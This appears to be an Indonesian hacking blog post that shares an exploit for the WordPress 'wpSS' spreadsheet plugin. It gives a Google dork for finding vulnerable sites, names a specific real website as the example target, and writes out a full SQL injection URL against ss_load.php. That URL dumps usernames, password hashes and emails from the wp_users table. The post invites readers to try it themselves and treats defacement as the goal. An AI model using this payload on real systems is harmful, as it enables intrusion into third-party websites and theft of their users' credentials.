Selamat malam dan apa kabar,maaf sebelumnya ini blog baru lagi :3 karena blog sebelum nya saya lupa email :ngakak: . Saya akan share Exploit WP Spreadsheet Wordpress , langsung aja ya di cobain..
Sebelumnya kita harus cari Dork nya dulu,seperti ini :
Dork : inurl:/wp-content/plugins/wpSS/
Lalu kita mencari Examplenya seperti ini :
http://www.aideenrogers.com/wp-content/plugins/wpSS/
Disini kita langsung saja menambah kan file .PHP plugin nya Seperti ini
http://www.aideenrogers.com/wp-content/plugins/wpSS/ss_load.php
Nah mari kita coba SQLi nya dengan menambahkan sedikit resep code :ngakak: seperti ini :
http://www.aideenrogers.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
Nah sebagai contoh kita udah masuk ke ss_load.php nya seperti ini :
Disitu ada Tulisan Hacked by , jadi kita sudah bisa langsung meng-hack website itu lewat Spreadsheet nya :)
* Untuk plugin yang belum terpatch,textnya akan tetap menjadi seperti itu . jikalau sudah di patch berarti tidak bisa di genti text nya :) *
Sekian dan terimakasih,
Semoga bermanfaat ya